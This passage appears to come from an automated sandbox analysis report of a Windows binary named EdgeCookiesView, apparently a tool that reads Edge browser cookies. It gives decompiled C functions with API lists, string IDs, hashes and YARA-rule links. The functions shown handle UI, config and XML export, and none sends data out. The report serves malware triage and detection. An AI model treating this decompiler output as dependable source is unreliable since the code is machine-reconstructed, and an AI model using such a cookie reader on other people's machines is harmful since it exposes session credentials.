				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
					if( *_t71 == _t46) {
						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
					}
				}
				if(_a4 != 0x103) {
					L29:
					return _t46;
				} else {
					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
						_t46 = E0040B0C2(_t73);
						_t71 = _a8;
					}
					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
						_t64 = 0;
						if(GetKeyState(0x10) < 0) {
							_t64 = 1;
						}
						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
						_t73 = _v8;
						_t71 = _a8;
					}
					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
							_t46 = E0040824E(_t71, _t68, _t92);
						}
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
								_t46 = E004081B3(_t71, _t63, 1);
							}
							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
							 *(_t73 + 0x210) = _t46;
						}
					}
					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
						goto L29;
					} else {
						_t46 = E00402D29(_t71);
						if(_t46 == 0) {
							goto L29;
						}
						_t46 = _t73 + 0x280;
						if( *_t46 != 0) {
							goto L29;
						}
						 *_t46 = 1;
						return E00401BDC(_t73, 0x402);
					}
				}
			}













                                                                                                                                                0x0040b659
                                                                                                                                                0x0040b66b
                                                                                                                                                0x0040b66e
                                                                                                                                                0x0040b671
                                                                                                                                                0x0040b674
                                                                                                                                                0x0040b682
                                                                                                                                                0x0040b698
                                                                                                                                                0x0040b6a8
                                                                                                                                                0x0040b6b6
                                                                                                                                                0x0040b6bb
                                                                                                                                                0x0040b6be
                                                                                                                                                0x0040b6c9
                                                                                                                                                0x0040b6d7
                                                                                                                                                0x0040b6dc
                                                                                                                                                0x0040b6e6
                                                                                                                                                0x0040b6e6
                                                                                                                                                0x0040b6f3
                                                                                                                                                0x0040b704
                                                                                                                                                0x0040b70c
                                                                                                                                                0x0040b71f
                                                                                                                                                0x0040b725
                                                                                                                                                0x0040b725
                                                                                                                                                0x0040b70c
                                                                                                                                                0x0040b72f
                                                                                                                                                0x0040b810
                                                                                                                                                0x0040b810
                                                                                                                                                0x0040b735
                                                                                                                                                0x0040b739
                                                                                                                                                0x0040b73d
                                                                                                                                                0x0040b742
                                                                                                                                                0x0040b742
                                                                                                                                                0x0040b749
                                                                                                                                                0x0040b74d
                                                                                                                                                0x0040b758
                                                                                                                                                0x0040b75a
                                                                                                                                                0x0040b75a
                                                                                                                                                0x0040b767
                                                                                                                                                0x0040b76c
                                                                                                                                                0x0040b76f
                                                                                                                                                0x0040b76f
                                                                                                                                                0x0040b772
                                                                                                                                                0x0040b77f
                                                                                                                                                0x0040b781
                                                                                                                                                0x0040b788
                                                                                                                                                0x0040b78c
                                                                                                                                                0x0040b78c
                                                                                                                                                0x0040b798
                                                                                                                                                0x0040b79a
                                                                                                                                                0x0040b7a6
                                                                                                                                                0x0040b7ae
                                                                                                                                                0x0040b7bc
                                                                                                                                                0x0040b7bc
                                                                                                                                                0x0040b7c1
                                                                                                                                                0x0040b7cb
                                                                                                                                                0x0040b7cb
                                                                                                                                                0x0040b798
                                                                                                                                                0x0040b7d5
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7d7
                                                                                                                                                0x0040b7e6
                                                                                                                                                0x0040b7ed
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7ef
                                                                                                                                                0x0040b7f8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7fa
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b807
                                                                                                                                                0x0040b7d5

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B698
                                                                                                                                                  • Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
                                                                                                                                                • GetMenuStringW.USER32 ref: 0040B71F
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0040B74F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID: < A
                                                                                                                                                • API String ID: 3550944819-1181716546
                                                                                                                                                • Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                • Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
                                                                                                                                                • Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                • Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040B147, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
				void _v526;
				long _v528;
				short _v1050;
				long _v1572;
				intOrPtr _v1576;
				char _v1580;
				void* __ebx;
				void* __edi;
				void* __esi;
				wchar_t* _t24;
				void* _t41;
				void* _t42;

				_t41 = __ecx;
				_t42 = __eax;
				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
					_v528 = 0;
					memset( &_v526, 0, 0x208);
					E00405800( &_v528);
					_t24 = wcsrchr( &_v528, 0x2e);
					if(_t24 != 0) {
						 *_t24 = 0;
					}
					wcscat( &_v528, L".cfg");
					_v1576 = _a4;
					_v1580 = 0x410838;
					_v1572 = 0;
					_v1050 = 0;
					wcscpy( &_v1572,  &_v528);
					E0040D909( &_v1580);
					_t45 =  &_v1580;
					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
					E0040196B(_t42, _t41,  &_v1580);
					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
				}
				return __eax;
			}















                                                                                                                                                0x0040b147
                                                                                                                                                0x0040b152
                                                                                                                                                0x0040b15c
                                                                                                                                                0x0040b16f
                                                                                                                                                0x0040b176
                                                                                                                                                0x0040b182
                                                                                                                                                0x0040b190
                                                                                                                                                0x0040b19a
                                                                                                                                                0x0040b19c
                                                                                                                                                0x0040b19c
                                                                                                                                                0x0040b1ac
                                                                                                                                                0x0040b1b4
                                                                                                                                                0x0040b1c8
                                                                                                                                                0x0040b1d2
                                                                                                                                                0x0040b1d9
                                                                                                                                                0x0040b1e0
                                                                                                                                                0x0040b1ee
                                                                                                                                                0x0040b1f9
                                                                                                                                                0x0040b1ff
                                                                                                                                                0x0040b206
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b218
                                                                                                                                                0x0040b21c

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B176
                                                                                                                                                  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B190
                                                                                                                                                • wcscat.MSVCRT ref: 0040B1AC
                                                                                                                                                • wcscpy.MSVCRT ref: 0040B1E0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcscpywcsrchr
                                                                                                                                                • String ID: .cfg
                                                                                                                                                • API String ID: 3959449883-3410578098
                                                                                                                                                • Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                • Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
                                                                                                                                                • Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                • Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408E65, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t30;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				_t38 = __ecx;
				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
						_t38 =  *((intOrPtr*)(__edi + 0x6c));
						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
						_t44 =  &_v516;
						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x6c)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x70)));
						L0040DFD6();
						_t46 = _t46 + 0x24;
						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
				}
				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
			}











                                                                                                                                                0x00408e65
                                                                                                                                                0x00408e65
                                                                                                                                                0x00408e79
                                                                                                                                                0x00408e7e
                                                                                                                                                0x00408e83
                                                                                                                                                0x00408e86
                                                                                                                                                0x00408e86
                                                                                                                                                0x00408e9c
                                                                                                                                                0x00408eb3
                                                                                                                                                0x00408eb5
                                                                                                                                                0x00408eb8
                                                                                                                                                0x00408ec7
                                                                                                                                                0x00408ecd
                                                                                                                                                0x00408ed2
                                                                                                                                                0x00408ed4
                                                                                                                                                0x00408ed5
                                                                                                                                                0x00408ed8
                                                                                                                                                0x00408ed9
                                                                                                                                                0x00408ede
                                                                                                                                                0x00408ee3
                                                                                                                                                0x00408ee6
                                                                                                                                                0x00408eeb
                                                                                                                                                0x00408ef6
                                                                                                                                                0x00408efb
                                                                                                                                                0x00408efc
                                                                                                                                                0x00408f01
                                                                                                                                                0x00408f13

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00408E9C
                                                                                                                                                  • Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57
                                                                                                                                                  • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                  • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                • _snwprintf.MSVCRT ref: 00408EE6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                • Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                • Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
                                                                                                                                                • Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                • Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BA94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040BA94(void* __esi) {
				struct _WNDCLASSW _v44;
				struct HINSTANCE__* _t20;
				struct HWND__* _t23;

				_v44.style = 0;
				_v44.lpfnWndProc = E00401896;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
				_v44.lpszClassName = __esi + 4;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassW( &_v44);
				_t20 = GetModuleHandleW(0);
				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
				 *(__esi + 0x208) = _t23;
				return _t23;
			}






                                                                                                                                                0x0040baa5
                                                                                                                                                0x0040baa8
                                                                                                                                                0x0040baaf
                                                                                                                                                0x0040bab2
                                                                                                                                                0x0040bab7
                                                                                                                                                0x0040bac0
                                                                                                                                                0x0040bac6
                                                                                                                                                0x0040bacd
                                                                                                                                                0x0040bad0
                                                                                                                                                0x0040bad7
                                                                                                                                                0x0040bada
                                                                                                                                                0x0040bae1
                                                                                                                                                0x0040bb05
                                                                                                                                                0x0040bb0c
                                                                                                                                                0x0040bb14

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,74B04E00,00000000), ref: 0040BAB5
                                                                                                                                                • RegisterClassW.USER32 ref: 0040BADA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
                                                                                                                                                • CreateWindowExW.USER32 ref: 0040BB05
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID: EdgeCookiesView
                                                                                                                                                • API String ID: 2678498856-2656830938
                                                                                                                                                • Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                • Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
                                                                                                                                                • Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                • Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406DE5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
				void _v8198;
				short _v8200;
				void* _t18;

				E0040E340(0x2004, _t18);
				_v8200 = _v8200 & 0x00000000;
				memset( &_v8198, 0, 0x2000);
				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
				if(_v8200 == 0 || _a12 != 0) {
					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
				} else {
					return 0;
				}
			}






                                                                                                                                                0x00406ded
                                                                                                                                                0x00406df2
                                                                                                                                                0x00406e0a
                                                                                                                                                0x00406e32
                                                                                                                                                0x00406e40
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e48
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e48

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406E0A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00406E32
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Writememset
                                                                                                                                                • String ID: 8,A$H.A
                                                                                                                                                • API String ID: 747731527-1209539780
                                                                                                                                                • Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                • Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
                                                                                                                                                • Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                • Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004053B1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040E340(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E004052B3(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040DFD6();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                                                0x004053b1
                                                                                                                                                0x004053b9
                                                                                                                                                0x004053bf
                                                                                                                                                0x004053c3
                                                                                                                                                0x004053cb
                                                                                                                                                0x004053cb
                                                                                                                                                0x004053d4
                                                                                                                                                0x004053df
                                                                                                                                                0x004053e0
                                                                                                                                                0x004053e1
                                                                                                                                                0x004053ec
                                                                                                                                                0x004053f1
                                                                                                                                                0x004053f2
                                                                                                                                                0x00405413

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
                                                                                                                                                • _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                • Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
                                                                                                                                                • Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                • Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DB6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E0040DB6F(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryW(L"shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                                                                                0x0040db76
                                                                                                                                                0x0040db7e
                                                                                                                                                0x0040db86
                                                                                                                                                0x0040db8e
                                                                                                                                                0x0040db9b
                                                                                                                                                0x0040db9b
                                                                                                                                                0x0040db9e
                                                                                                                                                0x0040dba8

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                • API String ID: 145871493-1506664499
                                                                                                                                                • Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                • Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
                                                                                                                                                • Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                • Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406B34, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t31;
				struct HWND__* _t33;

				_t31 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t33 = GetParent(_t31);
					GetWindowRect(_t31,  &_v20);
					GetClientRect(_t33,  &_v36);
					MapWindowPoints(0, _t33,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00405D0F(_t31, 0x400000);
				}
				return 1;
			}









                                                                                                                                                0x00406b3f
                                                                                                                                                0x00406b42
                                                                                                                                                0x00406b4c
                                                                                                                                                0x00406b53
                                                                                                                                                0x00406b5e
                                                                                                                                                0x00406b6e
                                                                                                                                                0x00406b7c
                                                                                                                                                0x00406b84
                                                                                                                                                0x00406b8a
                                                                                                                                                0x00406b90
                                                                                                                                                0x00406b95
                                                                                                                                                0x00406b9d
                                                                                                                                                0x00406ba3
                                                                                                                                                0x00406ba9

                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 00406B46
                                                                                                                                                • GetWindowRect.USER32 ref: 00406B53
                                                                                                                                                • GetClientRect.USER32 ref: 00406B5E
                                                                                                                                                • MapWindowPoints.USER32 ref: 00406B6E
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                • Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
                                                                                                                                                • Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                • Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409F23, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00409F23(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040E038();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
